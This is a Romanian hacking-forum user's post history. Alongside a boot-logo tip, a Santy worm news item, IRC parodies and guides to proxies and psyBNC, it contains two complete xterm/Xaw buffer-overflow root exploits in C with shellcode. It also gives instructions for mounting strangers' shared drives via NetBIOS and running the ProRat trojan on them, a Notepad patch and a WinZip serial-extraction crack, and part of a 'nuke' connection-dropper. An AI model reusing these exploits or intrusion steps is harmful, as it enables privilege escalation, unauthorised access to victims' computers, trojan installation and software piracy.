MaHaReT
Active Members-
Posts
900 -
Joined
-
Last visited
Everything posted by MaHaReT
-
Schimbarea imaginii de load a win-ului 1. Realizezi imaginea care doresti sa-ti apara la incarcarea windowsului in orice program doresti , insa trebuie neaparat sa aiba urmatorele caracteristici : A) sa aiba marimea : 640*480 sa aiba paleta de culori adik Color Depth setata la 16 colors ( 4 bit ) C) sa fie salvata ca si Boot.bmp D) sa fie copiata in C:Windows Bun pana aici . Acum trecem la pasul 2 si anume la Modificarea fisierului boot.ini care se afla in directorul C: dar este hidden nu il veti putea vedea nicicum . 2. Deschizi Control Panel / System dai la Advance , aici Mergi la Startup and Recovery si Dai SETTINGS pana cand ajungi la un window care ar trebui sa arate ca in imaginea din finalul paginii. Aici dai EDIT , si ti se va deschide fisierul boot.ini pe care va trebui sa-l faci sa arate cam asa : [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /fastdetect /noexecute=optin /bootlogo /noguiboot dupa care salvezi .
-
opera de obicei , dar mam cam dat pe mozila in ultima vreme !
-
DaDaDa jos Maneaua :) Bun Venit printre noi !!
-
nice nu ? Catzi mai multzi Kw3[R]Ln incerc sa fac si o reclama discreta pe mess !
-
incepator si`n aia eddie47 !! iesim cu baietzi la un pk da acuma`i prea kald si ne molesim
-
Tehnica Brute Force - Cum sa spargi un site
MaHaReT replied to MaHaReT's topic in Tutoriale in romana
incerc sa fiu cat se poate de util -
2-Decembrie-2004 31.000 de site-uri si forumuri de discutii de pe Web din intreaga lume au fost distruse Este foarte posibil ca atacul sa continue sub o forma diversificata, asupra site-urilor care folosesc phpBB Bucuresti, 22 decembrie 2004 - GeCAD NET avertizeaza asupra desfasurarii unui atac impotriva site-urilor web care folosesc phpBB, ce are ca efect distrugerea completa a datelor stocate in fisierele ce constituie site-ul respectiv. Pana miercuri seara fusesera distruse 30.900 de site-uri si forumuri in intreaga lume! Pe data de 22 Noiembrie, GeCAD NET a lansat o alerta de grad ridicat despre o serie de vulnerabilitati descoperite in programul phpBB versiunea 2.0.10. Una dintre acestea putea fi exploatata pentru a executa cod controlat de un posibil atacator pe sistemul afectat. Incepand din 21 Decembrie, companii producatoare de programe antivirus, precum Trend Micro si Symantec, au primit semnale ca a aparut si se propaga pe Internet o amenintare asemanatoare din punct de vedere al comportamentului cu un virus de tip vierme, care exploateaza vulnerabilitatea prezentata mai sus din phpBB pentru a se raspandi. Aceasta amenintare a primit numele de Santy. Amenintarea este reprezentata printr-un fisier script Perl, care foloseste motorul de cautare de la Google pentru a cauta servere de web care folosesc phpBB. Odata identificat un astfel de server, se va incerca exploatarea vulnerabilitatii prezentate mai sus. In cazul in care aceasta reuseste, viermele se va copia pe serverul atacat si se va lansa in executie, reluand atacurile si de pe noul server compromis. Dupa detectarea atacurilor, echipa tehnica de la Google a modificat modul de acces la motorul de cautare astfel incat in acest moment cautarile efectuate prin acest script sunt blocate, ca urmare raspandirea acestuia se pare ca a fost intrerupta. Sunt vulnerabile toate serverele de Internet care gazduiesc servicii web si au instalat phpBB versiunea 2.0.10 sau inferioara.
-
Atzi auzit de Vulcan ?
-
senix , si io`s nou !! de ieri Bun Venit !!
-
Date: Wed, 10 Jun 1998 20:09:07 +0200 (MET DST) From: "M.C.Mar" <woloszyn@nospam.it.pl> X-Sender: woloszyn@dollar.it.com.pl Reply-To: "M.C.Mar" <emsi@it.com.pl> To: fyodor@insecure.org Subject: my sploit Message-ID: <Pine.GSO.3.96.980610200850.7281v-100000@dollar.it.com.pl> X-Hidden-txt: Screw Windoze Hi! I developed sploit against Xaw and neXtaw which works even is Solar Designer's patch is applyed. While compiling tandard sploit developed by alcuin: emsi:~/hack> gcc xterm.c emsi:~/hack> ./a.out Segmentation fault Then as root: emsi:/home/mcmar/hack# grep overflow /var/adm/syslog -A1 Jun 10 19:09:39 emsi kernel: Possible buffer overflow exploit attempt: Jun 10 19:09:39 emsi kernel: Process xterm (pid 311, uid 1001, euid 0). Now compile my sploit: emsi:~/hack> gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc emsi:~/hack> ./a.out bash# Cool, izn't it? And here goes (for the eduction of curse my sploit source: emsi:~/hack> cat 3xterm.c /* A simple xploit working arround non-executable stack patch! Based on Solar Designer's: "Getting around non-executable stack(fix)" post and: Rafa? Wojtczuk's "Defeating Solar Designer'a Non-executable Stach Patch" sploit by Kil3r of Lam3rZ against both Xaw and neXtaw widgets based on xterm_exp.c by alcuin Compile it like this: gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc Description: The sploit simply passes the EXECLP address and its parameters addresses onto the stack. To work fine you need to look for execlp Program Linkage Table entry in xterm and for "/bin/sh" string in its data segment... emsi:~mcmar/hack# gdb xterm GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)... (gdb) print execlp $1 = {<text variable, no debug info>} 0x804bc78 <execlp> (gdb) x/s 0x8063d2e 0x8063d2e <_fini+8158>: "/bin/sh" 0x804bc78 and 0x8063d2e are OK for me, but you may need to look for the riht ones in your case... GreetZ: bulba, smierc and whole Lam3rZ teem and other Polish hackers. */ #include <stdlib.h> #include <stdio.h> #include <ctype.h> #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" #define EXECLP 0x804bc78 // execlp PLT adress in xterm #define BIN_SH 0x8063d2e // "/bin/sh" string address in xterm int *ptr; void main(int argc, char *argv[]) { char *home; FILE *f_in, *f_out; char buff[16384]; char shellbuf[16384]; char *s; int i; if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buff,16384,f_in); for (s=buff;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buff,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; ptr = (int *)(shellbuf+102b); *ptr++ =EXECLP; *ptr++ =EXECLP; *ptr++ =BIN_SH; *ptr++ =BIN_SH; *ptr++ = 0; fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } M.C.Mar An NT server can be run by an idiot, and usually is. emsi@it.pl "If you can't make it good, make it LOOK good." - Bill Gates Date: Mon, 4 May 1998 11:06:05 +0200 From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz> To: BUGTRAQ@NETSPACE.ORG Subject: Re: TOG and xterm problem On Fri, 1 May 1998, Jeff Gehlbach wrote: > Open Group, when *will* the rest of us see at least some clues about where > the bug lies and how it can be fixed? You say you won't release patches > to X11R<6.4, but can you at least be nice enough to tell those of us using > the still-perfectly-serviceable 6.3 just a tidbit about the problem? Believe or not, it took me 10 minutes to grep the appropriate parts of X11R6.3 sources, following the clues mentioned in the CERT advisory, and find the bugs--at least some of them. xc/programs/xterm/charproc.c: * HandleKeymapChange(): (void) sprintf( mapName, "%sKeymap", params[0] ); (void) strcpy( mapClass, mapName ); (actually, the second command is mostly harmless because the size of mapName and mapClass is the same) xc/programs/xterm/charproc.c: * VTInitI18N(): strcpy(tmp, term->misc.input_method); ... strcpy(buf, "@im="); strcat(buf, s); ... strcpy(tmp, term->misc.preedit_type); xc/lib/Xaw/XawIm.c: * OpenIM(): strcpy(modifiers, "@im="); strcat(modifiers, ve->im.im_list); * ParseIMNameList(): char *s, *save_s, *ss, *list[32], **lp, *end; ... list = s; (This one is quite interesting. Exercise for the reader: write an exploit.) <ironic> Security hint of the day: find . -name '*.[ch]' | xargs egrep -l 'sprintf|strcat|strcpy' | xargs rm </ironic> --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] P.S. A copy of this message is being submitted to XFree86. /* xterm_exp.c : linux/x86 xterm.Xaw exploit by alcuin - 5/4/98 - [ http://www.rootshell.com/ ] It works against both Xaw and neXtaw widgets NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to use xterm again. */ #include <stdlib.h> #include <stdio.h> #include <ctype.h> unsigned int getsp() { asm("mov %esp,%eax"); } inline rootshell(){ __asm__( "movb $0x56, %alnt" "l1:cmpb $0x12, %alnt" "je l2nt" "movb $0x12,%alnt" "call l1nt" "l2:pop %esint" "xorl %eax,%eaxnt" "movb $0x25, %alnt" "addl %eax,%esint" "movl %esi,%ebxnt" "movl %esi,%edint" "movb $8,%alnt" "addl %eax,%edint" "movb $5,%alnt" "addl %eax,%esint" "movl %esi,(%edi)nt" "movl %edi,%ecxnt" "incl %edint" "incl %edint" "incl %edint" "incl %edint" "xorb %al,%alnt" "movl %eax,(%edi)nt" "movl %edi,%edxnt" "movb $0xb,%alnt" "int $0x80nt" ".string "/bin/sh"n" ); } #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" main (int argc, char **argv) { char *home; FILE *f_in, *f_out; char buf[16384]; char shellbuf[16384]; char *s; int i; unsigned int sp=getsp(); if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buf,16384,f_in); for (s=buf;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buf,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; /* write the return adress */ s = shellbuf+2052; *(int *)s=sp+0x69F5; /* write the root shell code */ s = shellbuf+2800; strcpy(s,(char*)rootshell); fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } [ From CERT advisory VB-98.04 ] I. Description Vulnerabilities exist in the terminal emulator xterm(1), and the Xaw library distributed in various MIT X Consortium; X Consortium, Inc.; and The Open Group X Project Team releases. These vulnerabilities may be exploited by an intruder to gain root access. The resources and the releases affected by the xterm vulnerability are: Resources inputMethod preeditType *Keymap Release X11R3 NO NO YES X11R4 NO NO YES X11R5 NO NO YES X11R6 NO NO YES X11R6.1 YES YES YES X11R6.2 YES YES YES X11R6.3 YES YES YES X11R6.4 YES YES YES The resources and the releases affected by the Xaw library vulnerability are Resources inputMethod preeditType Release X11R6 YES YES X11R6.1 YES YES X11R6.2 YES YES X11R6.3 YES YES X11R6.4 YES YES (X11R6.2 was not released to the public.) The Open Group X Project Team has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable systems. This issue will be corrected in future X Project Team releases of X11.
-
am nest epoezi nice cu "Hacker`i"' Basm <tartar> a fost odata <tartar> un hacker <tartar> care traia pe cand se potcovea kernelu cu 2 3 surse la un picior <tartar> si acel hacker avea o fata <tartar> frumoasa foc <tartar> pe ia o chema Lara Croft ( nu stiu de ce aducea cu Angelina Jolie) <tartar> si toata ziaua se juca un singur joc <tartar> Tomb rider DoS 2 <tartar> acel hacker imbatranind <tartar> si nemaputand sa editeze singur sursele <tartar> pentru exploiturile sale <tartar> caci trebuie sa va spun dragii mosului <tartar> el facea expl pentru mous <tartar> tastatuta <tartar> monitor <tartar> si porturi <tartar> a luat pe langa el un script kiddie <tartar> sau un lamer <tartar> cum vreti voi sa ii ziceti <tartar> pe care il punea sa dea <tartar> vi gmp-expl.c <tartar> si apoi <tartar> sa dea :wq! <tartar> din cand in cand il lasa sa scrie si pe el cate un printf "Hello World n" <tartar> si sa isi puna numele la inceput <tartar> si asa .. 3l33tul nostru <tartar> a inceput sa isi puna numele pe mai toate sursele batranului hacker <tartar> aceasta murind ... <tartar> pe cand isi dadea obshtescul sfarsit <tartar> a chemat-o la el <tartar> pe fiica lui angelina <tartar> si i-a spus ... <tartar> fugi in lume fata mea <tartar> caci ajutorul meu <tartar> este un nenorocit <tartar> a preluat controlul main-framului <tartar> eu il credeam om de incredere <tartar> si el mi-a furat toate sursele <tartar> a rutat serverul nostru " acela se numea Serveru' lu' HAcker Imparat " <tartar> si acum vrea sa dea kill la toate pidurile noastra <tartar> si killall -9 la toate procesele noastre <tartar> fugi fata hackerului ... si salveaza semintia noastra <tartar> nu vreau ca intreaga reteaua sa fie populata cu script kiddie <tartar> si lameri <tartar> si astfel .. batranul hacker isi dadu ultimul echo <tartar> si i-au facut o inmormantare frumoasa in /dev/null <tartar> si nu s-a mai stiut nimic de el ... <tartar> caci Lamer Imparat <tartar> caci asa a inceput sa isi zica .. impostorul stersese toate logurile <tartar> si daduse si un updatedb & <tartar> si cat ar fi incercat ... supusii lui Hacker Imparat .. nu ar fi reusit sa mai gaseasca o urma .. <tartar> din sursele atat de importante ale stapanului lor <tartar> si noul imparat a inceput sa ii persecute pe oamenii de incredere ai hackerului <tartar> si sa ii urmareasca ... <tartar> pana si in /tmp <tartar> unde ultimii din acestia isi gasisera ... o ascunzatoare <tartar> si .... pe unde ii prindea ... le dadea kill <tartar> si a inceput incet incet ... sa recompileze si kernelul ... in serveru' lu' Lamer Imparat de acuma <tartar> insa .. cea mai mare problema a lamerului .. ramanea fiica fugara a hackerului .... <tartar> care reusite .. sa fuga din server ... <tartar> cu mari peripetzii ... caci packetele usuale .. nu au putut- o ajuta <tartar> serverul fiind filtrat in draci <tartar> si nici un icmp .. un echo .. sau ceva nu mai putea intra si iesi din el <tartar> si totul era logat <tartar> ... gasise insa o scapare .... a fugit ... ajutata de un vechi supus al imparatului <tartar> mai pervers el ... insa a ajutat-o pe fata <tartar> acest supus se numea TFTP <tartar> si a salvat-o pe drumul 69 Subject: M-a facut muica fludor M-a facut rutu' haxor Stau pe net , scanez de zor Cin'are rutu' mai tare ? Bagami-as pula-n rutare Foaie verde de kernel Ca acu' pun flud pe el Foaie verde , rut bengos Eu le iau doar dupa OS Sunt fludor , de jiuletzi Dau si ii pic , p-aia fletzi Am scaneru' cel mai bun Iau , si fludez ca din tun Foaie verde , de named Esti hacler ? , io nu te cred Foaie verde , a bindului Sa-i traiasca , scriptului Trec prin clase de IP Tu ma crezi ca sunt aci Eu insa spufez la greu Si sunt doar pe beneceu Foaie verde , rut rutat Acu' m-apuc de fludat Sh-o sa-tzi dau pe Tecepeu Apoi la greu , pe Udepeu Foaie verde , rut ca NASA Sa il ai , sa golesti casa Ca te cata , FBI Si te gaseste , sh-aci M-a facut rutu' un lamer Da' si mobilu' mi-e kramer M-a facut sa fiu eleete Sunt pushtan , si sunt scripete Insa-mi stie undernetu' sh-o cateodata dalnetu' De frica fludului Ca-s nebun shi-l dau oricui Foaie verde , de rut kit Sa-mi iei bula la belit Ca te fac in 3 minute Tu nici atat nu poti fute Eu sunt fludor dupe Jii Si n-am frica nimanui Haiku pixeli albi si negri in spatele consolei juiseaza frenetic root dupa root pierdut de lamer in van root dupa root an dupa an pui masca peste masca in fiecare an fire de nisip ridicate coborate din ceruri intr-un vartej negru noapte rapita plina de zgomote e apocalipsa M-o facut rutu' h4x0r ( adaptare dupa celebru' M-o facut muica oltean ) m-a facut mama haxor iau rutu din cuibusor am scaner dela bengos iau rutu' doar dupa OS foaie verde , de rutare cine are fludu' mai tare ? foaie verde de kernel l-am paciuit si pe el m-a facut mama eleet eu te tot las fara de net cine-tzi da pe udepeu ? sunt eu , fludor , cu tupeu daca tzi pun flud pe rutare te las fara demancare foaie verde , bandwitch lat foaie verde , rut rutat te fludez de te las lat stau non-stop pe internet si scanez pe undernet fac psibenecee la useri tu stai sh-o freci pe la luseri eu imi scot banu la greu tu stai sh-o tot freci mereu foaie verde , de redhat l-am rutat , e de cacat foaie verde de slackwer tu nu-l iei .. ca esti lamer sunt haxor de jiuletzi dau cu nuku dupa fletzi eu am slaisu' cel mai tare cand iti dau .. sigur te doare foaie verde ISP-eu cel mai haxor , raman eu am numai femei pe chat cu adminu' eu am blat e baiat de i-cafe' ma lasa sa stau pe nashpe' foaie verde , a rutului asha-i sta bine haclerului sa faci misto de prosti sa tz-o ard cand nu cunosti si acu' in incheiere o urare de durere iti urez sa-nvetzi si tu sa invetzi sa iei rutu' foaie verde , de rutare apuca-te de scanare ! foaie verde , de chixor asta-i balada de h4x0r ! RTFM Subject: Desteapta-te Admine ! Desteapta-te admine din fludu' cel de moarte In care te-adancira fludorii tai nepoate Acum ori niciodata .. porneste-ti iptrafu' La care sa se-nchine adminii , la provider Acum ori niciodata , sa-i prinzi pe ei in fapta Sa loghezi Tcp-ul , ip-urile de sala Ca-n aste tzevi .. iti curg packetele de flud Si ca-n a ta retzea , e varza UDP-ul Triumfator in battle-net .. esti tu Da' nu te-ajuta asta Sculati voi firewall-uri Sculati voi ipchains-uri Sa vedeti , adminul cum se plange Caci serverul e jos .. il tzin copii-n flud Priviti maretze hosturi ! Cum cad ele , ca spicu-n LAN de grau Sub seceri de tzarani Cu degete pe taste , incerci tu in zadar Reteaua ti-e fututa Si din WAN se prefacu'-n LAN Un provider ! ce nu e sub flud Un bandwitch cat mai lat ASta strigatzi toti Admini cu mintea creatza , cu ochelari "cur de sifon" Deviza lor e blatu' si prostia Murim mai bine-n flud , cu glorie de lamer Strigara-n cor adminii Decat sa citim iar manu' de la comenzi in linux Versurile imnului national apartin lui Andrei Muresanu (1816-1863), poet de factura romantica, ziarist, traducator, un adevarat tribun al epocii marcate de Revolutia de la 1848. Muzica a fost compusa de Anton Pann (1796-1854), poet si etnograf, om de mare cultura, cantaret si autor de manuale de muzica. Adaptarea pentru Matrimonial Internet Relay Chat apartine lui Tartar Orice asemanare cu fapte sau cu persoane reale este pur intamplatoare
-
Proxy - Schimbarea ip-ului de internet A) Cum sa folosesc un proxy? 1. Viziteaza http://www.antiproxy.com si cauta (in partea de jos, dreapta a paginii) un proxy pe un port (de obicei 8080 sau 1080). Vei vedea multe pagini cu proxy-uri. Alege un proxy ce are "latency" intre 0 si 5 (peste 5, proxy-ul este ceva mai lent), apoi faceti click pe "check" (se afla in partea dreapta a fiecarui proxy) pentru a vedea daca proxy-ul merge. Daca zice ca proxy-ul merge, copiati proxy-ul si portul. 2. Deschideti Internet Explorer. La "Tools", deschideti "Internet Options", apoi dati pe tab-ul "Connections". 3. Pentru Dial Up - Daca aveti mai multe posibilitati de conexiune, faceti click pe cea pe care sunteti conectat in acel moment (in partea stanga, la "Dial Up settings"). Apoi faceti click pe "Settings" (in dreapta). Acolo selectati optiunea "Automatically detect settings" (daca nu este deja selectata). Apoi selectati si optiunea "Use a proxy server". 4. Pentru cei ce folosesc o conexiune LAN, faceti click pe "LAN settings". Acolo selectati "Automatically detect settings" (daca nu este deja selectata). Apoi, putin mai jos, selectati "Use proxy server". 5. Acum la "Address" scrieti adresa proxy-ului (sau ip-ul) pe care l-ati gasit la www.antiproxy.com (sau dati "paste"), iar la "Port" scrieti portul pe care este proxy-ul.Acum dati "OK", si inca o data "OK" si gata. Acum aveti alt IP la folosirea Internet Explorer-ului. Toate site-urile pe care intrati va vor lua noul IP, ca fiind IP-ul dvs. De exemplu, daca ati gasit un proxy de Olanda, site-ul respectiv va crede ca sunteti din Olanda . Folosirea proxy-ului este foarte folositoare atunci cand incercati sa va faceti mai multe usere la Cservice (undernet) (de asemenea daca sunteti pe dial-up, dupa cum stiti nu merge sa facet user la undernet, insa cu proxy merge!!!).
-
Nuke rupe conectiunea - Cod de C++ #include <conio.h> #include <stdio.h> #include <winsock.h>struct { int port; char *targetIP; int NumOfAttact, BufSize;} parm;void Pause(void) { cprintf ("Apasati orice tasta pentru a renunta..."); getch(); cprintf ("rn"); } int CheckWinsock() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD(1, 1); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) return err; if ( LOBYTE( wsaData.wVersion ) != 1 || HIBYTE( wsaData.wVersion ) != 1 ) { WSACleanup(); return -1; } return 0;}void ParseIP(char* des, char *theIP){ unsigned int val; char i; for (i = 0; i < 4; i++) { if (*theIP != '
-
Hack si Crack Toate programele mentionate le gasiti folosind motorul de cautare in care tastati numele programului sau le gasiti in sectiunea DOWNLOAD. Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele. Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver. Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu. Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-ul persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934. Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii. Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network" care se gaseste in "control panel" activata. Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan. Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de comenzi: c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului} Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem ca numele este crystygye(nu,nu incercati la mine,eu nu intru pe chat-uri -. Tastati "c:/windows/net use f:IPcrystygye" si aveti acces la discul f al fraierului!. Sa explicam aceasta comanda: Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95. IP-adresa lui de ip. f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces. nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP" Sa instalam acum un troian cum ar fi ProRat pe calculatorul lamerului. Dupa ce dati comanda "c:/windows/net use f:IPcrystygye" copiati fisieul "server.exe" pe f: "copy server.exe f:" apoi il executati "f:/server.exe". DISTRACTIE PLACUTA Daca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti crea un disc virtual x: pe care sa puneti troianul. "net use x:IPtmpparola_dorita/user:ntwak0 "net copy server.exe" C-R-A-C-K-I-N-G ----------------------- N-O-T-E-P-A-D Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare mesajul "the file is too large for notepad to open......."????.Haideti sa scapam de acest mesaj si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie. 1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew 2) cunostinte minime de assembler -dezasamblati programul in w32dasm -activati optiunea "string reference" si cautati sirul "the file is too large..." -veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import -cautati functia User32.messageboxA(responsabile de casetele de dialog in windows) -dati dublu click pe ea si obtineti ceva de genul call dword ptr [00407430] {chemarea procedurii de mesaj} cmp eax,0000006{compara registrul eax cu adresa procedurii} jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiuni la selectarea lui OK se deschide Wordpad iar altfel iese. Celelalte instructiuni nu mai conteza - -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset -inchideti w32dasm -deschideti Hiew "hiew notepad.exe" -selectati F4 optiunea decode -F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)} -F3 scrieti 404840484048 -F9 pentru a valida introducerea -F5,scrieti numarul pentru jne care este 216A -F3,scrieti 404840484048 -F9 pentru a actualiza si Gata!!! Ce dracu' este 404840484048? 40-in hexazecimal inseamna "inc eax" adica adauga 1 48-inseamna "dec eax" adica scade 1 90 inseamna NOP adica instructiunea nula(nu face nimic) Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1). C-R-A-C-K-I-N-G W-I-N-Z-I-P -deschid winzip si unde mi se cere numarul de inregistrare introduc 66696669 -NU tatez Enter!!! Las winzip asa cum este si il deschid in w32dasm ca proces in executie -scanez in programul dezasamblat 66696669 in hexa -ma duc la adresa indicata cum ar fi 00154:FA14569 -gasesc ceva de genul: mov al,[edx] cmp al,[esi] jnz 00418956 Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in memorie in "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!!
-
- Setati portul dorit ( implicit 31337 ) - Setati numele bouncer-ului ( aici puneti ce doriti ) - Setati ip-ul pentu DCC ( /dns hostu` shell-ului in mIRC ) - Setati adresele de unde este permisa conectarea ( "*" in general ) Acestea fiin zise, acum trebuie sa compilati psyBNC-ul. Acest lucru este foarte simplu deoarece totul este pregatit. Trebuie doar sa tastati comanda make si procesul de compilare va fi initializat. La sfarsit, ar trebui sa aveti un programel numit psybnc in directorul psy-ului. Urmatorul pas este sa porniti psyBNC-ul acest lucu fiind la fel de simplu. Trebuie doar sa tastati ./psybnc si psy-ul va porni si va intra in background. Primul user care se conecteaza la psy este declarat owner. El poate adauga, sterge useru, adauga sau sterge admini etc. Iata acum cateva comenzi de baza pe care aproape sigur le veti folosi : /addserver [server]:[port] pentru a adauga un server in lista. Acesta este primul lucru care trebuie facut. Server-ul poate fi in forma non sau alfanumerica. /listservers pentru a vedea lista serverlor adaugate. /delserver [n] sterge serverul #[n] obtinut in urma folosirii comenzii /listservers. /jump deconecteaza psy-ul de la serverul curent si il conecteaza la urmatorul server din lista. /bquit deconecteaza psy-ul de la IRC si il tine asta pana il fortati sa se conecteze ( Nu prea este cazul sa o folositi ). /bconnect forteaza psy-ul sa se conecteze la IRC ( presupunand ca aveti cel putin un server adaugat in lista ). Retineti ca psy-ul ramane conectat la IRC chiar daca dvs nu mai sunteti conectat la el. Deci iata aici cateva comenzi utile pentru aceasta facilitate: /setleavemsg [mesaj] seteaza mesajul care va fi lasat pe toate canalele dupa ce va deconectati de la psy. /setaway [mesaj] seteaza mesajul de away care va aparea celor care iti vor da /whois sau iti vor trimite mesaje. /setawaynick [nick] seteaza nick-ul pe care il va folosi psy-ul atata timp cat nu sunteti conectat la el ( xyz[AW] de exemplu ). Inca o facilitate pe care o ofera psyBNC-ul datorita mentinerii conexiunii cu IRC-ul sunt logurile.Astfel puteti vizualiza toate mesajele pe care le-ati primit in timp ce nu ati fost conectat la psy. Iata aici cele doua comenzi utile: /playprivatelog pentru a vedea logurile. /eraseprivatelog pentru a le sterge. psyBNC-ul are o optiune al draku` de mishto. Suporta encriptarea textului trimis unei persoane sau unui canal. Fiecare persoana trebuie sa aiba parola ca sa poata intelege ceea ce vorbiti. Plus ca trebuie sa aiba psy A ... si inca ceva ... te face sa arati mai a haxorel Iata aici comenzi utile pentru a putea folosi aceasta facilitate: /encrypt [parola]:[canal/persoana] seteaza parola pentru canalul/persoana respectiva. /listencrypt pentru a vedea lista de canale/persoane asupra carora a fost aplicata encriptarea. /delencrypt pentru a sterge encriptarea cu numarul #[n] obtinuta in urma comenzii /listencrypt. psyBNC-ul are facilitatea de multi-user ( mai multi utilizatori pot folosi acelasi psyBNC ). Puteti adauga, sterge utilizatori, puteti sa le dati dreptul de a face acelasi lucru sau chiar sa le schimbati parola. Totul e la fel de simplu. Iata aici cateva comenzi pentru administrarea utilizatorilor: /adduser [utilizator]:[numele real] adauga utilizatorul [utilizator] cu full name-ul [numele real].[utilizator] este ident-ul iar [numele real] este full name-ul care vor aparea in urma unei comenzi /whois ---------------------------------- Scuzatzima ca am pus mai multe posturi dar spunea ca mesajul este prea lung .... -----------------------------------
-
descarcati direct in shell. Sunt mai multe modalitati (lynx, w get etc.). Urmatorul pas este sa dezarhivati acest fisier (tar.gz este ceva in genu` la .zip). Pentru asta folositi comanda tar -xzvf psyBNC2.3.1.tar.gz unde sa aveti mare grija la majuscule/minuscule. In unix totul conteaza. Retineti asta pentru viitor.Daca ati folosit comanda corect, ar trebui sa aveti un director numit psybnc. Intrati in el cu cd psybnc si tastati comanda ls -al. Veti vedea tot continutul directorului psybnc.Aruncati o privire pe acolo ... Acum urmeaza partea aia ... putin mai complicata pentru incepatori psyBNC-ul contine o interfata *grafica* pentru configurarea bouncer-ului. Insa aceasta necesita ncurses instalat in sistem. Din experietna mea, majoritatea sistemelor linux au asa ceva instalat dar altele (FreeBSD etc.) nu. Totusi faceti o incercare si scrieti make menuconfig. Daca apare o interfata placuta ochiului, felicitari... configurarea va fi mult mai simpla. Daca nu ... bine ati venit in lumea mea Cu menuconfig totul este mai simplu si usor de urmarit: in general, un [X] denota ca optiunea este selectata in timp ce un [ ] ca nu. Daca nu este menuconfig ...totul se reduce la editarea fisierului config.h din directorul psyBNC-ului. Aici am multe de scris shi nu am timp. Editarea acestui fisier va fi explicata intr-un upgrade viitor. Presupunand ca este menuconfig, unde nu este cine stie ce de configurat, va recomand sa faceti urmatoarele:
-
ma seaca , spuen cai prea lung msg`u ....... ! Sper ca atzi descarcat deja sursa. Daca nu, o puteti lua de pe site-ul oficial: http://www.psychoid.lam3rz.de/psyBNC2.3.1.tar.gz sau de pe site-ul meu de la sectiunea Download unde veti gasi si o versiune in limba romana, modificata de noi. Dupa ce ati luat sursa,faceti repede upload in shell. Cel mai comod este insa sa o
-
